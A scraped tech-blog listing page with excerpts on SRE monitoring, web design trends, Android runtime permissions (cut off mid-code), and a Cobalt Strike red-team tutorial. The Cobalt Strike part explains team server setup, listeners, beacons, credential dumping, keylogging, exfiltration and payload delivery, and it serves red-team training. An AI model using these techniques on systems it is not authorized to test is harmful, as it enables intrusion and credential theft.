Kotlin How to Secure and Deploy an Android App Android User Interface Development: Animating Widgets and Layouts
Read more
  • 0
  • 0
  • 27825

article-image-post-production-activities-for-ensuring-and-enhancing-it-reliability-tutorial
Savia Lobo
13 Jan 2019
15 min read
Save for later

Post-production activities for ensuring and enhancing IT reliability [Tutorial]

Savia Lobo
13 Jan 2019
15 min read
Evolving business expectations are being duly automated through a host of delectable developments in the IT space. These improvements elegantly empower business houses to deliver newer and premium business offerings fast. Businesses are insisting on reliable business operations.  IT pundits and professors are therefore striving hard and stretching further to bring forth viable methods and mechanisms toward reliable IT. Site Reliability Engineering (SRE) is a promising engineering discipline, and its key goals include significantly enhancing and ensuring the reliability aspects of IT. In this tutorial, we will focus on the various ways and means of bringing up the reliability assurance factor by embarking on some unique activities in the post-production/deployment phase. Monitoring, measuring, and managing the various operational and behavioral data is the first and foremost step toward reliable IT infrastructures and applications. This tutorial is an excerpt from a book titled Practical Site Reliability Engineering written by Pethuru Raj Chelliah, Shreyash Naithani, Shailender Singh. This book will teach you to create, deploy, and manage applications at scale using Site Reliability Engineering (SRE) principles. All the code files for this book can be found at GitHub. Monitoring clouds, clusters, and containers The cloud centers are being increasingly containerized and managed. That is, there are going to be well-entrenched containerized clouds soon. The formation and managing of containerized clouds get simplified through a host of container orchestration and management tools. There are both open source and commercial-grade container-monitoring tools. Kubernetes is emerging as the leading container orchestration and management platform. Thus, by leveraging the aforementioned toolsets, the process of setting up and sustaining containerized clouds is accelerated, risk-free, and rewarding. The tool-assisted monitoring of cloud resources (both coarse-grained as well as fine-grained) and applications in production environments is crucial to scaling the applications and providing resilient services. In a Kubernetes cluster, application performance can be examined at many different levels: containers, pods, services, and clusters. Through a single pane of glass, the operational team can provide the running applications and their resource utilization details to their users. These will give users the right insights into how the applications are performing, where application bottlenecks may be found, if any, and how to surmount any deviations and deficiencies of the applications. In short, application performance, security, scalability constraints, and other pertinent information can be captured and acted upon. Cloud infrastructure and application monitoring The cloud idea has disrupted, innovated, and transformed the IT world. Yet, the various cloud infrastructures, resources, and applications ought to be minutely monitored and measured through automated tools. The aspect of automation is gathering momentum in the cloud era. A slew of flexibilities in the form of customization, configuration, and composition are being enacted through cloud automation tools. A bevy of manual and semi-automated tasks are being fully automated through a series of advancements in the IT space. In this section, we will understand the infrastructure monitoring toward infrastructure optimization and automation. Enterprise-scale and mission-critical applications are being cloud-enabled to be deployed in various cloud environments (private, public, community, and hybrid). Furthermore, applications are being meticulously developed and deployed directly on cloud platforms using microservices architecture (MSA). Thus, besides cloud infrastructures, there are cloud-based IT platforms and middleware, business applications, and database management systems. The total IT is accordingly modernized to be cloud-ready. It is very important to precisely and perfectly monitor and measure every asset and aspect of cloud environments. Organizations need to have the capability for precisely monitoring the usage of the participating cloud resources. If there is any deviation, then the monitoring feature triggers an alert to the concerned to ponder about the next course of action. The monitoring capability includes viable tools for monitoring CPU usage per computing resource, the varying ratios between systems activity and user activity, and the CPU usage from specific job tasks. Also, organizations have to have the intrinsic capability for predictive analytics that allows them to capture trending data on memory utilization and filesystem growth. These details help the operational team to proactively plan the needed changes to computing/storage/network resources before they encounter service availability issues. Timely action is essential for ensuring business continuity. Not only infrastructures, but also applications' performance levels have to be closely monitored in order to embark on fine-tuning application code, as well as the infrastructure architectural considerations. Typically, organizations find it easier to monitor the performance of applications that are hosted at a single server, as opposed to the performance of composite applications that are leveraging several server resources. This becomes more tedious and tough when the underlying computer resources are spread across multiple and are distributed. The major worry here is that the team loses its visibility and controllability of third-party data center resources. Enterprises, for different valid reasons, prefer multi-cloud strategy for hosting their applications and data. There are several IT infrastructure management tools, practices, and principles. These traditional toolsets become obsolete for the cloud era. There are a number of distinct characteristics being associated with software-defined cloud environments. It is expected that any cloud application has to innately fulfill the non-functional requirements (NFRs) such as scalability, availability, performance, flexibility, and reliability. Research reports say that organizations across the globe enjoy significant cost savings and increased flexibility of management by modernizing and moving their applications into cloud environments. The monitoring tool capabilities It is paramount to deploy monitoring and management tools to effectively and efficiency run cloud environments, wherein thousands of computing, storage, and network solutions are running. The key characteristics of this tool are vividly illustrated through the following diagram: Here are some of the key features and capabilities we need to properly monitor for modern cloud-based applications and infrastructures: Firstly, the ability to capture and query events and traces in addition to data aggregation is essential. When a customer buys something online, the buying process generates a lot of HTTP requests. For proper end-to-end cloud monitoring, we need to see the exact set of HTTP requests the customer makes while completing the purchase. Any monitoring system has to have the capability to quickly identify bottlenecks and understand the relationships among different components. The solution has to give the exact response time of each component for each transaction. Critical metadata such as error traces and custom attributes ought to be made available to enhance trace and event data. By segmenting the data via the user and business-specific attributes, it is possible to prioritize improvements and sprint plans to optimize for those customers. Secondly, the monitoring system has to have the ability to monitor a wide variety of cloud environments (private, public, and hybrid). Thirdly, the monitoring solution has to scale for any emergency. The benefits Organizations that are using the right mix of technology solutions for IT infrastructure and business application monitoring in the cloud are to gain the following benefits: Performance engineering and enhancement On-demand computing Affordability Prognostic, predictive, and prescriptive analytics Any operational environment is in need of data analytics and machine learning capabilities to be intelligent in their everyday actions and reactions. As data centers and server farms evolve and embrace new technologies (virtualization and containerization), it becomes more difficult to determine what impacts these changes have on the server, storage, and network performance. By using proper analytics, system administrators and IT managers can easily identify and even predict potential choke points and errors before they create problems.  To know more about prognostic, predictive, and prescriptive analytics; head over to our book Practical Site Reliability Engineering. Log analytics Every software and hardware system generates a lot of log data (big data), and it is essential to do real-time log analytics to quickly understand whether there is any deviation or deficiency. This extracted knowledge helps administrators to consider countermeasures in time. Log analytics, if done systematically, facilitates preventive, predictive, and prescriptive maintenance. Workloads, IT platforms, middleware, databases, and hardware solutions all create a lot of log data when they are working together to complete business functionalities. There are several log analytics tools on the market. Open source log analytics platforms If there is a need to handle all log data in one place, then ELK is being touted as the best-in-class open source log analytics solution. There are an application as well as system logs. Logs are typically errors, warnings, and exceptions. ELK is a combination of three different products, namely Elasticsearch, Logstash, and Kibana (ELK). The macro-level ELK architecture is given as follows: Elasticsearch is a search mechanism that is based on the Lucene search to store and retrieve its data. Elasticsearch is, in a way, a NoSQL database. That is, it stores multi-structured data and does not support SQL as the query language. Elasticsearch has a REST API, which uses either PUT or POST to fetch the data. If you want real-time processing of big data, then Elasticsearch is the way forward.  Increasingly, Elasticsearch is being primed for real-time and affordable log analytics. Logstash is an open source and server-side data processing pipeline that ingests data from a variety of data sources simultaneously and transforms and sends them to a preferred database. Logstash also handles unstructured data with ease. Logstash has more than 200 plugins built in, and it is easy to come out on our own. Kibana is the last module of the famous ELK toolset and is an open source data visualization and exploration tool mainly used for performing log and time-series analytics, application monitoring, and IT operational analytics (ITOA). Kibana is gaining a lot of market and mind shares, as it makes it easy to make histograms, line graphs, pie charts, and heat maps. Logz.io, the commercialized version of the ELK platform, is the world's most popular open source log analysis platform. This is made available as an enterprise-grade service in the cloud. It assures high availability, unbreakable security, and scalability. Cloud-based log analytics platforms The log analytics capability is being given as a cloud-based and value-added service by various cloud service providers (CSPs). The Microsoft Azure cloud provides the log analytics service to its users/subscribers by constantly monitoring both cloud and on-premises environments to take correct decisions that ultimately ensure their availability and performance.  The Azure cloud has its own monitoring mechanism in place through its Azure monitor, which collects and meticulously analyze log data emitted by various Azure resources. The log analytics feature of the Azure cloud considers the monitoring data and correlates with other relevant data to supply additional insights. The same capability is also made available for private cloud environments. It can collect all types of log data through various tools from multiple sources and consolidate them into a single and centralized repository. Then, the suite of analysis tools in log analytics, such as log searches and views a collaborate with one another to provide you with centralized insights of your entire environment. The macro-level architecture is given here: This service is being given by other cloud service providers. AWS is one of the well-known providers amongst many others.  The paramount contributions of log analytics tools include the following: Infrastructure monitoring: Log analytics platforms easily and quickly analyze logs from bare metal (BM) servers and network solutions, such as firewalls, load balancers, application delivery controllers, CDN appliances, storage systems, virtual machines, and containers. Application performance monitoring: The analytics platform captures application logs, which are streamed live and takes the assigned performance metrics for doing real-time analysis and debugging. Security and compliance: The service provides an immutable log storage, centralization, and reporting to meet compliance requirements. It has deeper monitoring and decisive collaboration for extricating useful and usable insights. AI-enabled log analytics platforms Algorithmic IT Operations (AIOps) leverages the proven and potential AI algorithms to help organizations to make the path smooth for their digital transformation goals. AIOps is being touted as the way forward to substantially reduce IT operational costs. AIOps automates the process of analyzing IT infrastructures and business workloads to give right and relevant details to administrators about their functioning and performance levels. AIOps minutely monitors each of the participating resources and applications and then intelligently formulates the various steps to be considered for their continuous well being. AIOps helps to realize the goals of preventive and predictive maintenance of IT and business systems and also comes out with prescriptive details for resolving issues with all the clarity and confidence. Furthermore, AIOps lets IT teams conduct root-cause analysis by identifying and correlating issues. Loom Loom is a leading provider of AIOps solutions. Loom's AIOps platform is consistently leveraging competent machine-learning algorithms to easily and quickly automate the log analysis process. The real-time analytics capability of the ML algorithms enables organizations to arrive at correct resolutions for the issues and to complete the resolution tasks in an accelerated fashion. Loom delivers an AI-powered log analysis platform to predict all kinds of impending issues and prescribe the resolution steps. The overlay or anomaly detection is rapidly found, and the strategically sound solution gets formulated with the assistance of this AI-centric log analytics platform . IT operational analytics Operational analytics helps with the following: Extricating operational insights Reducing IT costs and complexity Improving employee productivity Identifying and fixing service problems for an enhanced user experience Gaining end-to-end insights critical to the business operations, offerings, and outputs To facilitate operational analytics, there are integrated platforms, and their contributions are given as follows: Troubleshoot applications, investigate security incidents, and facilitate compliance requirements in minutes instead of hours or days Analyze various performance indicators to enhance system performance Use report-generation capabilities to indicate the various trends in preferred formats (maps, charts, and graphs) and much more! Thus, the operational analytics capability comes handy in capturing operational data (real-time and batch) and crunching them to produce actionable insights to enable autonomic systems. Also, the operational team members, IT experts, and business decision-makers can get useful information on working out correct countermeasures if necessary. The operational insights gained also convey what needs to be done to empower the systems under investigation to attain their optimal performance. IT performance and scalability analytics There are typically big gaps between the theoretical and practical performance limits. The challenge is how to enable systems to attain their theoretical performance level under any circumstance. The performance level required can suffer due to various reasons like poor system design, bugs in software, network bandwidth, third-party dependencies, and I/O access. Middleware solutions can also contribute to the unexpected performance degradation of the system. The system's performance has to be maintained under any loads (user, message, and data). Performance testing is one way of recognizing the performance bottlenecks and adequately addressing them. The testing is performed in the pre-production phase. Besides the system performance, application scalability and infrastructure elasticity are other prominent requirements. There are two scalability options, indicated as follows: Scale up for fully utilizing SMP hardware Scale-out for fully utilizing distributed processors It is also possible to have both at the same time. That is, to scale up and out is to combine the two scalability choices. IT security analytics IT infrastructure security, application security, and data (at rest, transit, and usage) security are the top three security challenges, and there are security solutions approaching the issues at different levels and layers. Access-control mechanisms, cryptography, hashing, digest, digital signature, watermarking, and steganography are the well-known and widely used aspects of ensuing impenetrable and unbreakable security. There's also security testing, and ethical hacking for identifying any security risk factors and eliminating them at the budding stage itself. All kinds of security holes, vulnerabilities, and threats are meticulously unearthed in to deploy defect-free, safety-critical, and secure software applications. During the post-production phase, the security-related data is being extracted out of both software and hardware products, to precisely and painstakingly spit out security insights that in turn goes a long way in empowering security experts and architects to bring forth viable solutions to ensure the utmost security and safety for IT infrastructures and software applications. The importance of root-cause analysis The cost of service downtime is growing up. There are reliable reports stating that the cost of downtime ranges from $100,000-$72,000 per minute. Identifying the root-cause (mean-time-to-identification (MTTI) generally takes hours. For a complex situation, the process may run into days. OverOps analyzes code in staging and production to automatically detect and deliver the root-causes for all errors with no dependency on logging. OverOps shows you a stack trace for every error and exception. However, it also shows you the complete source code, objects, variables, and values that caused that error or exception to be thrown. This assists in identifying the root-cause of when your code breaks. OverOps injects a hyperlink into the exception's link, and you'll be able to jump directly into the source code and actual variable state that cause it. OverOps can co-exist in production alongside all the major APM agents and profilers. Using OverOps with your APM allows monitoring server slowdowns and errors, along with the ability to drill down into the real root-cause of each issue. Summary There are several activities being strategically planned and executed to enhance the resiliency, robustness, and versatility of enterprise, edge, and embedded IT. This tutorial described the various post-production data analytics to allow you to gain a deeper understanding of applications, middleware solutions, databases, and IT infrastructures to manage them effectively and efficiently. In order to gain experience on working with SRE concepts and be able to deliver highly reliable apps and services, check out this book Practical Site Reliability Engineering. Site reliability engineering: Nat Welch on what it is and why we need it [Interview] Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity 5 ways artificial intelligence is upgrading software engineering
Read more
  • 0
  • 0
  • 49572

article-image-7-web-design-trends-and-predictions-for-2019
Guest Contributor
12 Jan 2019
6 min read
Save for later

7 Web design trends and predictions for 2019

Guest Contributor
12 Jan 2019
6 min read
Staying updated about web design trends is very crucial. The latest norm today may change tomorrow with shifting algorithms, captivating visuals and introduction of best practices. Remaining on top by frequently reforming your website is thus quintessential to avoid looking like a reminiscent of an outdated website. 2019 will be all about engaging website designs focusing on flat designs, captivating structures & layouts, speed, mobile performance and so on. Here are 7 web design predictions which we think will be trending in 2019 #1 Website speed You would have come across this pivotal aspect of web design. It is strongly recommended for the loading time of websites to be necessarily less than three seconds to have a lasting impact on visitors. Having your visitors waiting for more than this duration would result in a high bounce rate. Based on a survey by Aberdeen Group, 5% of organizations found that website visitors abandoned their website in a second of delay. Enthralling website design with overloaded data slowing your page speed could eat up on your revenue in a huge way. Google Speed updates which came into effect from July 2018 emphasize the need to focus on the page loading time. Moreover, Google prioritizes and ranks faster loading websites. Though the need for videos and images still exists in web design, the need in 2019 will be to reduce the page loading time without compromising on the look of the website. #2 Mobile first phenomenon With user preferences inclined greatly towards mobile devices, the need for the “mobile first” web design has become the need of the hour. This is not only to rank higher on SERP but also to boost the quality of customer experiences on the device. Websites need to be exclusively designed for mobile devices in the first place. The mobile first web design is a completely focused conceptualization of the website on mobile taking into consideration parameters like a responsive and user-friendly design. Again, 2019 will need more of optimization inclined towards voice search. Users are impatient to get hold of information in the fastest way possible. Voice search on mobile will include: Focusing on long tail keywords, conversational and natural spoken language. Appropriate usage of schema metadata Emphasize on semantics Optimization based on local listing This is yet another unmissable trend of 2019. #3 Flat designs Clutter-free, focused websites have always been in demand. Flat design is all about minimalism and improved usability. This kind of design helps to focus on the important parts of the website using bright colors, clean-edged designs and a lot of free space. There are two reasons for website owners to opt for flat designs in 2019. They contain lesser components which are data-light, and are fast- loading, improving the website speed and optimization quotient. Also, it enhances customer experience with a quick loading website on both the mobile and desktop versions. So by adapting to flat designs, websites can stay back longer on user favorite lists, in turn, churning out elevated conversion rates. #4 Micro-animations Micro animations may seem like minute features on a webpage but they do add great value. A color change when you click the submit button conveys that the action has been performed. An enlarged list when you point the mouse on a particular product makes your presence felt. Such animations communicate to the user about actions accomplished. Again, visuals are always captivating, be it a background video or a micro animation. Such micro animations do impact by creating a visual hierarchy and compelling users towards conversion points. So micro animations are definitely here to stay back in 2019. #5 Chatbots Chatbots have become much more common as they help bridge communication gaps. This is because these chatbots have emerged smarter with improved Artificial Intelligence and machine learning techniques. They can improve response time, personalize communication and automate repetitive tasks. Chatbots understand our data based on previous chat history, predict what we might be looking for and give us auto recommendations about products. Chatbots can sense our interest and provide us with personalized ad content thereby enhancing customer satisfaction. Chatbots serve as crucial touch points. They can intelligently handle customer service while collecting sensitive customer data for the sales team. This way you can analyze your customer base even before initiating a first cut discussion with them. 2019 will be a year which will see many more such interactions being incorporated in websites. #6 Single page designs Simple, clutter-free and single page design is going to be a buzzword of 2019. When we say single page design it literally means a single page without extra links leading to blogs or detailed services. The next question would be about SEO optimization based on keywords and content. To begin with, a single page designed websites have a neatly siloed hierarchy. As they do not have aspects that slow down your website, they are easily compatible across devices. The page-less design has minimal HTML and JavaScript which improves customer experience, in turn, helping to earn a higher keyword ranking on SEO. Also, with way lesser elements on the page, they can be managed easily. Frequent updates and changes based on customer expectations and trends can be done at regular intervals adding greater value to the website. This is yet another aspect to watch in 2019. #7 Shapes incorporated Incorporating simple geometric shapes on your website could do wonders with its appearance. They are easily loadable and are also engaging. Shapes are similar to colors which throw an impact on the mood of the visitors. Rectangles showcase stability, circles represent unity and triangles are supposed to reflect dynamism. Using shapes based on your aesthetic sense either sparingly or liberally can definitely catch the attention of your visitors. You could place them in areas you want to seek attention and create a visual hierarchy. Implementing geometric shapes on your website will drive traffic and affect your potential sales in a huge way. Staying on top of the competition is all about presenting fresh ideas without compromising on the quality of services and user experience. Emerge as a pacesetter on par with upcoming trends and differentiate your services in the current milieu to reap maximum benefits. Author Bio Swetha S. is adept at creating customer-centered marketing strategies focused on augmenting brand presence. She is currently the Digital Marketing Manager for eGrove Systems and Elite Site optimizer, contributing towards the success of the organization.
Read more
  • 0
  • 0
  • 23094
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at €18.99/month. Cancel anytime
article-image-red-team-tactics-getting-started-with-cobalt-strike-tutorial
Savia Lobo
12 Jan 2019
15 min read
Save for later

Red Team Tactics: Getting started with Cobalt Strike [Tutorial]

Savia Lobo
12 Jan 2019
15 min read
According to cobaltstrike.com: "Cobalt Strike is a software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response." This tutorial is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book demonstrates advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of what Cobalt Strike is, how to set it up, and also about its interface. Before installing Cobalt Strike, please make sure that you have Oracle Java installed with version 1.7 or above. You can check whether or not you have Java installed by executing the following command: java -version If you receive the java command not found error or another related error, then you need to install Java on your system. You can download this here: https://www.java.com/en/. Cobalt Strike comes in a package that consists of a client and server files. To start with the setup, we need to run the team server. The following are the files that you'll get once you download the package: The first thing we need to do is run the team server script located in the same directory. What is a team server? This is the main controller for the payloads that are used in Cobalt Strike. It logs all of the events that occur in Cobalt Strike. It collects all the credentials that are discovered in the post-exploitation phase or used by the attacker on the target systems to log in. It is a simple bash script that calls for the Metasploit RPC service (msfrpcd) and starts the server with cobaltstrike.jar. This script can be customized according to the needs. Cobalt Strike works on a client-server model in which the red-teamer connects to the team server via the Cobalt Strike client. All the connections (bind/reverse) to/from the victims are managed by the team server. The system requirements for running the team server are as follows: System requirements: 2 GHz+ processor 2 GB RAM 500MB+ available disk space Amazon EC2: At least a high-CPU medium (c1.medium, 1.7 GB) instance Supported operating systems: Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 The Cobalt Strike client supports: Windows 7 and above macOS X 10.10 and above Kali Linux 1.0, 2.0 – i386 and AMD64 Ubuntu Linux 12.04, 14.04 – x86, and x86_64 As shown in the following screenshot, the team server needs at least two mandatory arguments in order to run. This includes host, which is an IP address that is reachable from the internet. If behind a home router, you can port forward the listener's port on the router. The second mandatory argument is password, which will be used by the team server for authentication: The third and fourth arguments specify a Malleable C2 communication profile and a kill date for the payloads (both optional). A Malleable C2 profile is a straightforward program that determines how to change information and store it in an exchange. It's a really cool feature in Cobalt Strike. The team server must run with the root privileges so that it can start the listener on system ports (port numbers: 0-1023); otherwise, you will receive a Permission denied error when attempting to start a listener: The Permission denied error can be seen on the team server console window, as shown in the following screenshot: Now that the concept of the team server has been explained, we can move on to the next topic. You'll learn how to set up a team server for accessing it through Cobalt Strike. Cobalt Strike setup The team server can be run using the following command: sudo ./teamserver 192.168.10.122 harry@123 Here, I am using the IP 192.168.10.122 as my team server and harry@123 as my password for the team server: If you receive the same output as we can see in the preceding screenshot, then this means that your team server is running successfully. Of course, the SHA256 hash for the SSL certificate used by the team server will be different each time it runs on your system, so don't worry if the hash changes each time you start the server. Upon successfully starting the server, we can now get on with the client. To run the client, use the following command: java -jar cobaltstrike.jar This command will open up the connect dialog, which is used to connect to the Cobalt Strike team server. At this point, you need to provide the team server IP, the Port number (which is 50050, by default), the User (which can be any random user of your choice), and the Password for the team server. The client will connect with the team server when you press the Connect button. Upon successful authorization, you will see a team server fingerprint verification window. This window will ask you to show the exact same SHA256 hash for the SSL certificate that was generated by the team server at runtime. This verification only happens once during the initial stages of connection. If you see this window again, your team server is either restarted or you are connected to a new device. This is a precautionary measure for preventing Man-in-the-Middle (MITM) attacks: Once the connection is established with the team server, the Cobalt Strike client will open: Let's look further to understand the Cobalt Strike interface so that you can use it to its full potential in a red-team engagement. Cobalt Strike interface The user interface for Cobalt Strike is divided into two horizontal sections, as demonstrated in the preceding screenshot. These sections are the visualization tab and the display tab. The top of the interface shows the visualization tab, which visually displays all the sessions and targets in order to make it possible to better understand the network of the compromised host. The bottom of the interface shows the display tab, which is used to display the Cobalt Strike features and sessions for interaction. Toolbar Common features used in Cobalt Strike can be readily accessible at the click of a button. The toolbar offers you all the common functions to speed up your Cobalt Strike usage: Each feature in the toolbar is as follows: Connecting to another team server In order to connect to another team server, you can click on the + sign, which will open up the connect window: All of the previous connections will be stored as a profile and can be called for connection again in the connect window: Disconnecting from the team server By clicking on the minus (–) sign, you will be disconnected from the current instance of the team server: You will also see a box just above the server switchbar that says Disconnected from team server. Once you disconnect from the instance, you can close it and continue the operations on the other instance. However, be sure to bear in mind that once you close the tab after disconnection, you will lose all display tabs that were open on that particular instance. What's wrong with that? This may cause some issues. This is because in a red-team operation you do not always have the specific script that will execute certain commands and save the information in the database. In this case, it would be better to execute the command on a shell and then save the output on Notepad or Sublime. However, not many people follow this practice, and hence they lose a lot of valuable information. You can now imagine how heart-breaking it can be to close the instance in case of disconnection and find that all of your shell output (which was not even copied to Notepad) is gone! Configure listeners For a team server to function properly, you need to configure a listener. But before we can do this, we need to know what a listener actually is. Just like the handler used in Metasploit (that is, exploit/multi/handler), the Cobalt Strike team server also needs a handler for handling the bind/reverse connections to and from the target/victim's system/server. You can configure a listener by clicking on the headphones-like icon: After clicking the headphones icon, you'll open the Listeners tab in the bottom section. Click on the Add button to add a new listener: You can choose the type of payload you want to listen for with the Host IP address and the port to listen on for the team server or the redirector: In this case, we have used a beacon payload, which will be communicating over SSL. Beacon payloads are a special kind of payload in Cobalt Strike that may look like a generic meterpreter but actually have much more functionality than that. Beacons will be discussed in more detail in further chapters. As a beacon uses HTTP/S as the communication channel to check for the tasking allotted to it, you'll be asked to give the IP address for the team server and domain name in case any redirector is configured (Redirectors will be discussed in more details in further chapters): Once you're done with the previous step, you have now successfully configured your listener. Your listener is now ready for the incoming connection: Session graphs To see the sessions in a graph view, you can click the button shown in the following screenshot: Session graphs will show a graphical representation of the systems that have been compromised and injected with the payloads. In the following screenshot, the system displayed on the screen has been compromised. PT is the user, PT-PC is the computer name (hostname), and the numbers just after the @ are the PIDs of the processes that have the payload injected into them: When you escalate the privileges from a normal user to NT AUTHORITY\SYSTEM (vertical privilege escalation), the session graph will show the system in red and surrounded by lightning bolts. There is also another thing to notice here: the * (asterisk) just after the username. This means that the system with PID 1784 is escalated to NT AUTHORITY\SYSTEM: Session table To see the open sessions in a tabular view, click on the button shown in the following screenshot: All the sessions that are opened in Cobalt Strike will be shown along with the sessions' details. For example, this may include external IP, internal IP, user, computer name, PID into which the session is injected, or last. Last is an element of Cobalt Strike that is similar to WhatsApp's Last Seen feature, showing the last time that the compromised system contacted the team server (in seconds). This is generally used to check when the session was last active: Right-clicking on one of the sessions gives the user multiple options to interact with, as demonstrated in the following screenshot: These options will be discussed later in the book. Targets list To view the targets, click on the button shown in the following screenshot: Targets will only show the IP address and the computer name, as follows: For further options, you can right-click on the target: From here, you can interact with the sessions opened on the target system. As you can see in the preceding screenshot, PT@2908 is the session opened on the given IP and the beacon payload resides in the PID 2908. Consequently, we can interact with this session directly from here: Credentials Credentials such as web login passwords, password hashes extracted from the SAM file, plain-text passwords extracted using mimikatz, etc. are retrieved from the compromised system and are saved in the database. They can be displayed by clicking on the icon shown in the following screenshot: When you perform a hashdump in Metasploit (a post-exploitation module that dumps all NTLM password hashes from the SAM database), the credentials are saved in the database. With this, when you dump hashes in Cobalt Strike or when you use valid credentials to log in, the credentials are saved and can be viewed from here: Downloaded files To view all the exfiltrated data from the target system, you can click on the button shown in the following screenshot: This will show the files (exfiltration) that were downloaded from the target system: Keystrokes This option is generally used when you have enabled a keylogger in the beacon. The keylogger will then log the keystrokes and send it to the beacon. To use this option, click the button shown in the following screenshot: When a user logs into the system, the keylogger will log all the keystrokes of that user (explorer.exe is a good candidate for keylogging). So, before you enable the keylogger from the beacon, migrate or inject a new beacon into the explorer.exe process and then start the keylogger. Once you do this, you can see that there's a new entry in the Keystrokes tab: The left side of the tab will show the information related to the beacon. This may include the user, the computer name, the PID in which the keylogger is injected, and the timestamp when the keylogger sends the saved keystrokes to the beacon. In contrast, the right side of the tab will show you the keystrokes that were logged. Screenshots To view the screenshots from the target system, click on the button shown in the following screenshot: This will open up the tab for screenshots. Here, you will get to know what's happening on the system's screen at that moment itself. This is quite helpful when a server administrator is logged in to the system and works on Active Directory (AD) and Domain Controller (DC) settings. When monitoring the screen, we can find crucial information that can lead to DC compromise: To know about Payload generation in stageless Windows executable, Java signed applet, and MS Office macros, head over to the book for a complete overview. Scripted web delivery This technique is used to deliver the payload via the web. To continue, click on the button shown in the following screenshot: A scripted web delivery will deliver the payload to the target system when the generated command/script is executed on the system. A new window will open where you can select the type of script/command that will be used for payload delivery. Here, you also have the option to add the listener accordingly: File hosting Files that you want to host on a web server can also be hosted through the Cobalt Strike team server. To host a file through the team server, click on the button shown in the following screenshot: This will bring up the window where you can set the URI, the file you want to host, the web server's IP address and port, and the MIME type. Once done, you can download the same file from the Cobalt Strike team server's web server. You can also provide the IP and port information of your favorite web redirector. This method is generally used for payload delivery: Managing the web server The web server running on the team server, which is generally used for file hosting and beacons, can be managed as well. To manage the web server, click on the button shown in the following screenshot: This will open the Sites tab where you can find all web services, the beacons, and the jobs assigned to those running beacons. You can manage the jobs here: Server switchbar The Cobalt Strike client can connect to multiple team servers at the same time and you can manage all the existing connections through the server switchbar. The switchbar allows you to switch between the server instances: You can also rename the instances according to the role of the server. To do this, simply right-click on the Instance tab and you'll get two options: Rename and Disconnect: You need to click on the Rename button to rename the instance of your choice. Once you click this button, you'll be prompted for the new name that you want to give to your instance: For now, we have changed this to EspionageServer: Renaming the switchbar helps a lot when it comes to managing multiple sessions from multiple team servers at the same time. To know more about how to customize a team server head over to the book. To summarize, we got to know what a team server is, how to setup Cobalt Strike and about the Cobalt Strike Interface. If you've enjoyed reading this, head over to the book, Hands-On Red Team Tactics to know about advanced penetration testing tools, techniques to get reverse shells over encrypted channels, and processes for post-exploitation. “All of my engineering teams have a machine learning feature on their roadmap” – Will Ballard talks artificial intelligence in 2019 [Interview] IEEE Computer Society predicts top ten tech trends for 2019: assisted transportation, chatbots, and deep learning accelerators among others Facebook releases DeepFocus, an AI-powered rendering system to make virtual reality more real
Read more
  • 0
  • 0
  • 35987

article-image-getting-your-android-app-ready-for-the-play-storetutorial
Natasha Mathur
11 Jan 2019
11 min read
Save for later

Getting your Android app ready for the Play Store[Tutorial]

Natasha Mathur
11 Jan 2019
11 min read
In this tutorial, we will discuss adding finishing touches to your Android app before you release it to the play store such as using the Android 6.0 Runtime permission model, scheduling an alarm,  receiving notification of a device boot, Using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. This tutorial is an excerpt taken from the book 'Android 9 Development Cookbook - Third Edition', written by Rick Boyer. The book explores more than 100 proven industry standard recipes and strategies to help you build feature-rich and reliable Android Pie apps. The Android 6.0 Runtime Permission Model The old security model was a sore point for many in Android. It's common to see reviews commenting on the permissions an app requires. Sometimes, permissions were unrealistic (such as a Flashlight app requiring internet permission), but other times, the developer had good reasons to request certain permissions. The main problem was that it was an all-or-nothing prospect. This finally changed with the Android 6 Marshmallow (API 23) release. The new permission model still declares permissions in the manifest as before, but users have the option of selectively accepting or denying each permission. Users can even revoke a previously granted permission. Although this is a welcome change for many, for a developer, it has the potential to break the code that was working before. Google now requires apps to target Android 6.0 (API 23) and above to be included on the Play Store. If you haven't already updated your app, apps not updated will be removed by the end of the year (2018). Getting ready Create a new project in Android Studio and call it RuntimePermission. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. The sample source code sets the minimum API to 23, but this is not required. If your compileSdkVersion is API 23 or above, the compiler will flag your code for the new security model. How to do it... We need to start by adding our required permission to the manifest, then we'll add a button to call our check permission code. Open the Android Manifest and follow these steps: Add the following permission: Open activity_main.xml and replace the existing TextView with this button: Open MainActivity.java and add the following constant to the class: private final int REQUEST_PERMISSION_SEND_SMS=1; Add this method for a permission check: private boolean checkPermission(String permission) { int permissionCheck = ContextCompat.checkSelfPermission( this, permission); return (permissionCheck == PackageManager.PERMISSION_GRANTED); } Add this method to request permission: private void requestPermission(String permissionName, int permissionRequestCode) { ActivityCompat.requestPermissions(this, new String[]{permissionName}, permissionRequestCode); } Add this method to show the explanation dialog: private void showExplanation(String title, String message, final String permission, final int permissionRequestCode) { AlertDialog.Builder builder = new AlertDialog.Builder(this); builder.setTitle(title) .setMessage(message) .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog,int id) { requestPermission(permission, permissionRequestCode); } }); builder.create().show(); } Add this method to handle the button click: public void doSomething(View view) { if (!checkPermission(Manifest.permission.SEND_SMS)) { if (ActivityCompat.shouldShowRequestPermissionRationale(this, Manifest.permission.SEND_SMS)) { showExplanation("Permission Needed", "Rationale", Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } else { requestPermission(Manifest.permission.SEND_SMS, REQUEST_PERMISSION_SEND_SMS); } } else { Toast.makeText(MainActivity.this, "Permission (already) Granted!", Toast.LENGTH_SHORT) .show(); } } Override onRequestPermissionsResult() as follows: @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { switch (requestCode) { case REQUEST_PERMISSION_SEND_SMS: { if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED) { Toast.makeText(MainActivity.this, "Granted!", 